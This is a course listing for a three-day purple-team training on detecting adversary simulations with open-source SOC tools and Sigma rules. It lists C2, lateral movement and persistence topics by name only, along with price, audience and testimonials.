In & Out (Purple Edition) – Detection as Code vs Adversary Simulations

This training is based on PurpleLABS – a dedicated virtual infrastructure for conducting detection and analysis of attackers’ behavior in terms of used techniques, tactics, procedures, and offensive tools. The environment has been set up to serve the constant improvement of competences in the field of threat hunting (threat hunting) and learning about current trends of offensive actions (red-teaming) vs detection phases (blue-teaming).

Original price was: $4,299.00.Current price is: $3,299.00.


3 days

Delivery Method




Seats Available



3 days

Delivery Method





Ask us about upcoming dates!

This special In & Out – Detection as Code vs Adversary Simulations – Purple Edition (Red and Blue on Steroids) is an advanced, fast-track, lab-based training created to present participants:

  • The importance of Blue and Red team cooperation
  • Advanced detection methods and techniques against exfiltration and lateral movement including event mapping, grouping, and tagging
  • Understand the tactics and behaviors of the adversary after gaining initial access to the network (Linux/Windows)
  • Detection methods of C2 traffic, tunneling, hiding, pivoting and custom, simulated malicious network events
  • Capabilities of many popular Open Source tools and integration with 3rd party security (IDS/IPS/WAF/EDR/FPC) and analytics solutions against adversaries C2-based actions
  • Verification methods and techniques for product and service providers from IT Security space in terms of internal testing and PoC / PoV programs

The primary goal of this training is to generate offensive attack events/symptoms within PurpleLABS infrastructure that later should be detected by Open Source SOC stack including Sigma – the open standard event description rule set and the rest of dedicated, open-source security solutions in use.

Participants will thoroughly familiarize themselves with the content of the available Sigma detection rules and their structure, better understand the essence of offensive actions, learn the low-level relationships between data sources, and thus achieve knowledge in creating their own detection rules and eventually bypassing them.



  • 1. Introduction:

    Introduction to Adversary Simulations and Open Source Attack Emulation projects: ● Atomic Red Team ● PurpleSharp ● RTA ● APT simulator ● Dumpster Fire ● Firebolt ● Flightsim ● BYOB ● Metta ● Infection Monkey ● Caldera and more

  • 2. MITRE Attack Framework & Sigma rules →

    MITRE Attack Framework & Sigma rules → detection map based on recent examples of chained attack scenarios.

  • 3. Finding malicious artifacts using yara, ssdeep, Volatility and memtriage:

    ● How yara works and why it could be your best friend ● Yarascan + Volatility Framework ● memtriage ● Yara vs webshells

  • 4. Collecting, analyzing and correlating data from different data sources using:

    ● Splunk ● Hunting ELK ● Wazuh ● Graylog ● Netflow ● Zeek IDS ● Suricata IDS ● Moloch FPC ● Auditd / go-audit ● eBPF ● OSquery ● Velociraptor

  • 5. Windows Sysinternals Suite:

    ● Sysmon:○ Process execution events ○ Network connection events ○ Image load events ○ Named pipe events ○ WMI events ○ PSexec events ○ Process Explorer ○ Process Monitor ○ Autoruns ● Evidence traces of file download and execution: ○ cmd.exe ○ HTA ○ JS ○ VBS ○ WSF ○ JSE ○ CSharp ○ certutil ○ Powershell ○ Bitsadmin ● Shellcode injection techniques ● WebDAV / SMB / NFS share mapping

  • 6. Low level Linux security tracing and profiling for critical services:

    ● eBPF ● sysdig

  • 7. Playing with Zeek IDS / Suricata IDS for anomaly detection → finding malicious artifacts at the network level:

    ● The importance of network baseline for high-risk environments ● Virtual SPAN / TAP and Netflow → OpenVswitch ● Feature definition and extraction ● Bro-cut syntax ● Bro Script Index ● Client / server Fingerprinting: ○ JA3 ○ HASSH ● Security feature extraction per many different network protocols

  • 8. Detection and traces of C2 and network exfiltration techniques → use cases:

    ● ICMP ● TCP / UDP ● SSL / TLS ● DNS / DoH / DGA / anomalies ● HTTP / HTTP2 / QUIC ● LDAP Exfil ● Dropbox / Twitter / Google / Mozilla / Discord / Slack ● SMB bind named pipes ● Legitimate website covert channel ● Intelligent HTTP C2 Redirection ● Port knocking ● Domain fronting ● ngrok / shooter ● Egress testing and common network traffic on non-standard ports

  • 9. Detection and traces of C2 post-exploitation, lateral movements → use cases:

    ● AD Reconnaissance / AD Snapshot ● Bloodhound artifacts ● Golden Ticket ● Silver Ticket ● Kerberoasting ● RPC over TCP/IP ● DCsync / DCShadow ● Mimikatz agent/server ● Pass The Hash ● SMBexec ● Invoke-WMI ● WinRM ● Invoke-PSexec ● PSRemoting ● RDP wrapping ● Offensive Powershell: ○ WMI multiple sessions ○ Remote network relaying ○ Copy VSS ○ Keylogging ○ LSA secrets extraction ○ Sandbox / virtual environment detection ○ UAC bypassing ○ Poisoning LLMNR, NBT-NS, MDNS, WPAD and WSUS ○ SMB ransomware detection. ○ Browser pivoting ○ SSH Tunneling and pivoting ○ RDP Tunneling and pivoting / RDP Inception

  • 10. Detection of brute-force attacks → use cases:

    ● SQL ● AD / Kerberos ● SSH ● Web Apps

  • 11. Windows Malware Persistence Methods:

    ● Service ● Winlogon registry entries ● Run / RunOnce ● Scheduled Tasks ● Startup Folder ● WMI ● DLL

  • 12. Linux Malware Persistence Methods:

    ● Service ● Startup scripts ● SSH magic password ● Port knocking / iptables ● Kernel modules

  • 13. Describing and creating relevant log events in generic and open signature → Sigma rules:

    ● Application ● APT ● Linux ● Network ● Proxy ● Web ● Windows

Why You Should Take This Course

This unique approach of ‘Detection as Code vs Adversary Simulations’ in a condensed format will allow increasing the level of knowledge in the field of RED / BLUE / PURPLE to both experienced specialists and beginners while maintaining the attractiveness and pleasure of performed tasks – detection does not have to be boring and tedious!  

Who Should Attend

  • Red and Blue team members
  • Security / Data Analytics
  • CIRT / Incident Response Specialists
  • Network Security Engineers
  • SOC members and SIEM Engineers
  • AI / Machine Learning Developers
  • Chief Security Officers and IT Security Directors

Who Should Attend


Key Learning Objectives

  • Learn ways to improve your detection and event correlations skills across many different data sources

  • Find the malicious activities and identify threats details on the network

  • Prepare your SOC team for fast filtering out network noise and allow for better incident response handling

  • Learn current trends, techniques, and tools for network exfiltration and lateral movements

  • Find out how DFIR / IR Open Source Software can support your SIEM infrastructure

  • Understand the value of DLP / IDS / IPS / FW / WAF / Memory Forensics against real adversary lab scenarios

  • Understand values from an automated approach to simulating attackers and generating anomalies

  • Identify blind spots in your network security posture
  • Prerequisite Knowledge

    • An intermediate level of command-line syntax experience using Linux and Windows
    • Fundament knowledge of TCP/IP network protocols
    • Penetration testing experience performing enumeration, exploiting, and lateral movement is beneficial, but not required
    • Basic programming skills are a plus, but not essential

    What students say about this training


    “The content of in and out was great. Lots of gained knowledge and hands on!”


    “Great course! A truly huge number of topics and tools covered”


    “Leszek was a really good trainer, he covered a lot of material, and had a very good personality.”


    “Leszek Miś is very knowledge in the topics covered in the course. He also shares real life scenario which were useful for participant to better understand application of material presented. Contents were very good, it covers many leading open source project which i find it useful. I would recommend this course to my colleagues.”


    Hardware / Software Requirements

    • VPN client installed according to VPN Setup instructions
    • Slack account as an invite to dedicated training channel will be sent
    • Stable internet connection
    • Recommended:
      • Zoom client installed
      • HD Camera to have 1:1 access to an instructor and the rest of the participants.
    This training is based on dedicated PurpleLABS cloud infrastructure, so there are no special student’s desktop requirements. No more initial setup issues, just a pure training experience!

    Your Instructor

    No data was found